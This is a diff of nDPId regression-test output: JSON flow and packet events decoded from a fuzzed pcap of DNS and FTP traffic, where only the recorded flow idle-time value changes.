00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469632829,"flow_last_seen":1120469632829,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1120469632829,"l3_proto":"ip4","src_ip":"192.114.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ftp.ecite?e.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -83,62 +83,62 @@ 00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469633828,"flow_last_seen":1120469633828,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1120469633828,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ftp.ecitele.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1120469634840,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1120469634840,"pkt":"AODtAW69ADBUADRWCABFAACaAABAAEARtv\/AqAEBwKgBAgA1Cp8Ahtfh7dSBgAABAAKzAgABA2Z0cLxlY2l0ZexlA2NvbQAAAQABwAwABQABAAAC9QAGA2Ruc8AQwC0AAQABAAAAIQAEk+oB\/cAQAAIAAQAAA0MAEQJucwViYXJhawNuZXQCaWwAwBAAAgABAAADQwACwC3ATwABAGoAAAARAATUljCp"} 00887{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":43,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469633828,"flow_last_seen":1120469634840,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1120469634840,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"147.234.1.253"}} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469634878,"flow_last_seen":1120469634878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469634878,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1120469634878,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469634878,"pkt":"ADBUAHNWAODtAW69CABFAAAwaaxAAIAGOYrAqAECk+oB\/QqgABWvnVkPAABkAHACQABuKwAAAgQFtAEBBAI="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469634878,"flow_last_seen":1120469634878,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469634878,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1120469634878,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469634878,"pkt":"ADBUAHNWAODtAW69CABFAAAwaaxAAIAGOYrAqAECk+oB\/QqgABWvnVkPAABkAHACQABuKwAAAgQFtAEBBAI="} 00195{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":45,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1120469634896} 00366{"packet_event_id":1,"packet_event_name":"packet","packet_id":45,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":62,"pkt_l4_len":0,"thread_ts_msec":1120469634878,"pkt":"AODtAW69ADBUADRWCABVAAAweP9AADkGcTeT6gH9wKgBAgAVCqDlH5UEr53DEHASYzbQ8AAAAQEEAgIEBYM="} 00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":46,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":20,"global_ts_msec":1120469634896} 00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":46,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":54,"pkt_l4_len":0,"thread_ts_msec":1120469634878,"pkt":"ADBUADRWAODtAW69CABFAAAoaa1eAIAGOZHAqAECk+oB\/QqgABWvncMQ5R+VBVAQQiQelgAA"} -00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1120469634993,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1120469634993,"pkt":"AODtAW4UADBUADRWCABFEABeeQBAADkGcPiT6gH9wKgBAgAVCqDlH5UFr53DEFAYYzaF6QAAMjIwIFByb0ZUUEQgU2VydmVyIEluIEVDSSBUZWxlY29tIChudHAsZWNpdGVsZS5jQ20pIA0K"} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1120469634993,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1120469634993,"pkt":"ADBUADRWAODtAW69CABFAAA4aa5AAIAGOYDAqAECk+oB\/QqgABWvncNQ5R+VO1AYQe6WoQAAnlNFUiBhbm9ueW1vdXMNCg=="} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635010,"flow_last_seen":1120469635010,"flow_idle_time":7440000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":1,"thread_ts_msec":1120469635010,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.169.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1120469635010,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1120469635010,"pkt":"AOBzAW69ADBUADRWCABFEAB0eQJAADkGcOCT6gH9wKkBAgAVCqDlH5U7r53DIFAYYzZecwAAMzMxIEFub255bW91cyBsb2dpbiBvaywgc2VuZCB5b3VyIGNvbXBsZXRlIGVtYWlsIGFkZHJlc3Mg4XMgeW91ciBwYXNzd29yZC4NCg=="} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635012,"flow_last_seen":1120469635012,"flow_idle_time":7440000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1120469635012,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2679,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1120469635012,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1120469635012,"pkt":"ADBUACRWAODtAW69CABFAAA0aa9AAIAGOYPAqAECk+oB\/Qp3ABWvncMg5R+Vb1AYQaK71QAAUEFTUyBkMHhhIQ0K"} +00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1120469634993,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1120469634993,"pkt":"AODtAW4UADBUADRWCABFEABeeQBAADkGcPiT6gH9wKgBAgAVCqDlH5UFr53DEFAYYzaF6QAAMjIwIFByb0ZUUEQgU2VydmVyIEluIEVDSSBUZWxlY29tIChudHAsZWNpdGVsZS5jQ20pIA0K"} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1120469634993,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1120469634993,"pkt":"ADBUADRWAODtAW69CABFAAA4aa5AAIAGOYDAqAECk+oB\/QqgABWvncNQ5R+VO1AYQe6WoQAAnlNFUiBhbm9ueW1vdXMNCg=="} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635010,"flow_last_seen":1120469635010,"flow_idle_time":7560000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":1,"thread_ts_msec":1120469635010,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.169.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1120469635010,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1120469635010,"pkt":"AOBzAW69ADBUADRWCABFEAB0eQJAADkGcOCT6gH9wKkBAgAVCqDlH5U7r53DIFAYYzZecwAAMzMxIEFub255bW91cyBsb2dpbiBvaywgc2VuZCB5b3VyIGNvbXBsZXRlIGVtYWlsIGFkZHJlc3Mg4XMgeW91ciBwYXNzd29yZC4NCg=="} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635012,"flow_last_seen":1120469635012,"flow_idle_time":7560000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1120469635012,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2679,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1120469635012,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1120469635012,"pkt":"ADBUACRWAODtAW69CABFAAA0aa9AAIAGOYPAqAECk+oB\/Qp3ABWvncMg5R+Vb1AYQaK71QAAUEFTUyBkMHhhIQ0K"} 00195{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":55,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1120469635042} 00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":55,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":54,"pkt_l4_len":0,"thread_ts_msec":1120469635042,"pkt":"ADBUADRWAODtAW69CAAGAAAoabBAAIAGOY7AqAECk+oB\/QqgABWvncMs5R+VqVAQQYAeegAA"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635042,"flow_last_seen":1120469635042,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120469635042,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.2.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1120469635042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":23,"thread_ts_msec":1120469635042,"pkt":"AODtAW69ADBUBDRWCABFEAAreQZAADkGcSWT6gH9wAIBAgAVCqDlH5Wpr53DLFAYYzbSqwAAIA0KAAAA"} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635043,"flow_last_seen":1120469635043,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1120469635043,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.66","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1120469635043,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1120469635043,"pkt":"AODtAW69ADBUADRWCABFEABDeQdAADkGcQyT6gH9wKgBQgAVCqDlH5Wsr53DLFAYYzYWCgAAIC9wdWIJCS0+IFB1YmxpYyBGb2xkZXIuIA0K"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635042,"flow_last_seen":1120469635042,"flow_idle_time":7560000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120469635042,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.2.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1120469635042,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":23,"thread_ts_msec":1120469635042,"pkt":"AODtAW69ADBUBDRWCABFEAAreQZAADkGcSWT6gH9wAIBAgAVCqDlH5Wpr53DLFAYYzbSqwAAIA0KAAAA"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635043,"flow_last_seen":1120469635043,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1120469635043,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.66","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1120469635043,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1120469635043,"pkt":"AODtAW69ADBUADRWCABFEABDeQdAADkGcQyT6gH9wKgBQgAVCqDlH5Wsr53DLFAYYzYWCgAAIC9wdWIJCS0+IFB1YmxpYyBGb2xkZXIuIA0K"} 00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":62,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":53,"global_ts_msec":1120469635044} 00398{"packet_event_id":1,"packet_event_name":"packet","packet_id":62,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":87,"pkt_l4_len":0,"thread_ts_msec":1120469635044,"pkt":"AODtAW69ADBUADRWCABFJXMAeQpAADkGcQOT6gH9wKgBAgB4CqDlH5YGr53DLFAYY3bTEAAAIC9pbmNvbWluZwktJXMAbmNvbWluZyBGb2xkZXIuIA0K"} -00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635045,"flow_last_seen":1120469635045,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1120469635045,"l3_proto":"ip4","src_ip":"147.234.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1120469635045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1120469635045,"pkt":"AODtAW69ADBUADRWCABFEABjeQtAADkGcOiT6gGqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} +00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635045,"flow_last_seen":1120469635045,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1120469635045,"l3_proto":"ip4","src_ip":"147.234.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1120469635045,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1120469635045,"pkt":"AODtAW69ADBUADRWCABFEABjeQtAADkGcOiT6gGqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":65,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":53,"global_ts_msec":1120469635045} 00398{"packet_event_id":1,"packet_event_name":"packet","packet_id":65,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":87,"pkt_l4_len":0,"thread_ts_msec":1120469635045,"pkt":"AODtAW69ADBUJXMACABFEBBJeQxAADkGcQGT6gH5wKgBAggVCqDlH5Zir53DLFAYYzaAtgAAIC9vdXRnb2luZwktPiBvdXRnb2luZyBGb2xkZXIuIA0K"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635046,"flow_last_seen":1120469635046,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120469635046,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2208,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1120469635046,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":23,"thread_ts_msec":1120469635046,"pkt":"AKrtAW69ADBUADRWCABFEAAreQ5AADkGcR2T6gH9wKgBAgAVCKDlH5a+r53DLFgYYzbRlgAAIFUKAAAA"} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635048,"flow_last_seen":1120469635048,"flow_idle_time":7440000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":1,"thread_ts_msec":1120469635048,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2732,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1120469635048,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1120469635048,"pkt":"AODtAW69ADBUADRWCABFEABjeQ9AADkGcOST6gH9wKgBAgAVCqzlH5bBr53DLFAYYzY9pwAAIEZpbGVzIGxhcmdlciB0aGVuIDI1ME1CIHdpbGwgYmUgZGVsZXRlZCBhZnRlciA1IGRheXMgISEhDQo="} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635049,"flow_last_seen":1120469635049,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120469635049,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":1045,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1120469635049,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":23,"thread_ts_msec":1120469635049,"pkt":"AODtAW69ADBUADRWCABFEAAreRJAADkGcRmT6gH9wKgBAgQVCqDlH5cvr53DLFAYYzbRJQAAIA0KAAAA"} 